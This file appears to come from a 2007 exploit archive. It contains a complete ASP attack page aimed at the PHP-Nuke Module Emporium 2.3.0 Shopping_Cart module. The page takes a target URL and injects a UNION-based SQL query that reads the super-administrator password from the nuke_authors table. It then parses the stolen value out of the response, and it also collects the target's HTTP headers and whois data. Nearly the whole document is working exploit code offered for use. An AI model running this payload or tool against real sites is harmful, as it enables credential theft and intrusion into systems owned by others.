phpnuke-sql.txt
Posted on 20 February 2007
<% Response.Buffer = True %> <% On Error Resume Next %> <% Server.ScriptTimeout = 100 %> <% '=============================================================================================== '[Script Name: Php-Nuke Module Emporium <= 2.3.0 Remote Blind SQL Injection Exploit '[Coded by : ajann '[Author : ajann '[Contact : :( '[S.Page : http://www.burnwave.com/ '[ExploitName: exploit2.asp '[Note : exploit file name =>exploit2.asp '[Update: + Get Header '[Update: + Get Whois Info '=============================================================================================== %> <% title="Php-Nuke Module Emporium <= 2.3.0 Remote Blind SQL Injection Exploit" 'Vuln Title %> <html> <title><% = title %></title> <head> <meta name="generator" content="Microsoft FrontPage 5.0"> <script language="JavaScript"> function functionControl1(){ setTimeout("functionControl2()",2000); } function functionControl2(){ if(document.form1.field1.value==""){ alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again"); } } function writetext() { if(document.form1.field1.value==""){ document.getElementById('htmlAlani').innerHTML='<font face="Verdana" size="1" color="#008000">There is a problem... The Data Didn't Take </font>' } } function write(){ setTimeout("writetext()",1000); } </script> </head> <body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000"> <center> <font face="Verdana" size="2" color="#008000"><b><a href="exploit2.asp"><u><% = title %> </b></u></a></font><br><br> <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"> <tr> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"> <font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p> <b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User ID=1]</b></font></p> </td> <td width="50%"> <center> <form method="post" name="form1" action="exploit2.asp?islem=get"> <input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080"> <input type="submit" value="Get"></form></center></td> </tr> </table> <div id=htmlAlani></div> <% islem = Request.QueryString("islem") If islem = "hata1" Then Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>" End If If islem = "hata2" Then Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>" End If If islem = "hata3" Then Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>" End If If islem = "hata4" Then Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Just Numeric Character!</font>" End If %> <% If islem = "get" Then id= Request.Form("id") file="modules.php?name=Shopping_Cart&file=category&category_id=" sql="1/1%20union%20select%200,pwd,0%20from%20nuke_authors%20where%20radminsuper=1/*" idform = Request.Form("id") targettext = Request.Form("text1") arama=InStr(1, targettext, "union" ,1) arama2=InStr(1, targettext, "http://" ,1) If targettext="" Then Response.Redirect("exploit2.asp?islem=hata1") Else If arama>0 then Response.Redirect("exploit2.asp?islem=hata2") Else If arama2=0 then Response.Redirect("exploit2.asp?islem=hata3") Else IF Not IsNumeric(idform) Then Response.Redirect("exploit2.asp?islem=hata4") Else %> <% target1 = targettext+file+sql Public Function take(come) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake .Open "GET" , come, FALSE .sEnd take = .Responsetext End With SET objtake = Nothing End Function get_username = take(target1) getdata=InStr(get_username,"0 0/" ) username=Mid(get_username,getdata+5,90) Dim metin metin = take(target1) Dim objReg Set objReg = New RegExp objReg.Global = True objReg.IgnoreCase = True objReg.Pattern = "0""><b>[A-Za-z0-9]+</b>" Dim calistir, istediginString Set calistir = objReg.Execute(metin) If calistir.Count = 0 Then Response.write "Not True" Else basusername = Replace(calistir.Item(0), "0""><b>" , "" ) basusername = Replace(basusername, "</b>" , "" ) End If Set bulunanlar = Nothing Set objReg = Nothing %> <center> <font face="Verdana" size="2" color="#008000"> <u><b> ajann<br></b></u></font><br> <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"> <tr> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"> <b><font size="2" face="Arial">Password Admin:</font></b></td> <td width="80%"> <b><font color="#C0C0C0" size="2" face="Verdana"><%=basusername%></b></font></p> </td> </tr> </table> </center> <br> <% hedef = targettext Dim objem Set objem = Server.CreateObject("MSXML2.ServerXMLHTTP") objem.Open "GET" , hedef , false objem.sEnd strHTML = objem.ResponseText header=objem.getallResponseheaders() Response.Write "<center>" Response.Write "<b>" Response.Write "<p><font color=""#008000"" face=""Verdana"" size=""2"">Header Bilgileri</font></p>" Response.Write "</b>" Response.Write "<p><font color=""#008000"" face=""Verdana"" size=""2"">" & header & "</font></p>" Response.Write "<p><font color=""#008000"" face=""Verdana"" size=""2""><b>Whois</b></font></p>" Response.Write "<p><font size=""2"" color=""#008000"">Site:</font><font color=""#008000"" size=""1"">[google.com]</font></p>" Response.Write "</center>" Set objem=Nothing %> <center><form method="post" name="form2" action="exploit2.asp?islem=whois"> <p> <input type="text" name="whoissite" size="20" value="domainwhois" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dashed #008000; background-color: #000000"> <input type="submit" value="Yolla" name="B1"></p> </form></center> <br> <form method="POST" name="form2" action="#"> <input type="hidden" name="field1" size="20" value="sdfsd"> </form> <script language="JavaScript"> write() functionControl1() </script> </b></font> </body> </html> <% End If End If End If End If End If %> <% If islem = "whois" Then site = Request.Form("whoissite") target1 = "http://reports.internic.net/cgi/whois?whois_nic=" & site & "&type=domain" Public Function take(come) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake .Open "GET" , come, FALSE .sEnd take = .Responsetext End With Set objtake = Nothing End Function remoteadres=take(target1) dim baslangic , bitis baslangic = "<pre>" bitis = "</pre>" dim x , abc x = 0 abc = 0 dim sonuc sonuc = "" Do Until abc = 2 x = x + 1 If Mid(remoteadres,x,Len(bitis)) = bitis and abc = 1 Then abc = abc + 1 End If If Mid(remoteadres,x,Len(baslangic)) = baslangic Then abc = abc + 1 Else If abc = 1 Then sonuc = sonuc + Mid(remoteadres,x,1) End If End If Loop Set objtake=Nothing %> <center> <b><font color="#008000" face="Verdana" size="2">Whois Bilgileri</font></b><p> <textarea rows="20" name="S1" cols="68" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dotted #008000; background-color: #000000"> <% Response.Write "<" & sonuc %> </textarea> </p> </center> <center><form method="post" name="form2" action="exploit2.asp?islem=whois"> <p> <input type="text" name="whoissite" size="20" value="domainwhois" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dashed #008000; background-color: #000000"> <input type="submit" value="Yolla" name="B1"></p> </form></center> <% End If %> <% Response.Write "<br>" Response.Write "<center>" Response.Write "<pre class=""info"">" Response.Write "<font color=""#C0C0C0"" size=""1"">" Response.Write "En iyi " Response.Write "</font>" Response.Write "<font size=""1"" color=""#808080""><span class=""info2"">" Response.Write "1152x864 " Response.Write "</span></font>" Response.Write "<font color=""#C0C0C0"" size=""1"">znrlk ve " Response.Write "<span class=""info2""><font size=""1"" color=""#808080"">Firefox </font></span>" Response.Write "ile grntlnebilir.</font></pre>" Response.Write "<pre class=""info"">" Response.Write "<font color=""#C0C0C0"" size=""1"">" Response.Write "Exploit coded by " Response.Write "</font>" Response.Write "<font size=""1"" color=""#808080""><span class=""info2"">" Response.Write "ajann" Response.Write "</span></font>" Response.Write "</center>" %>
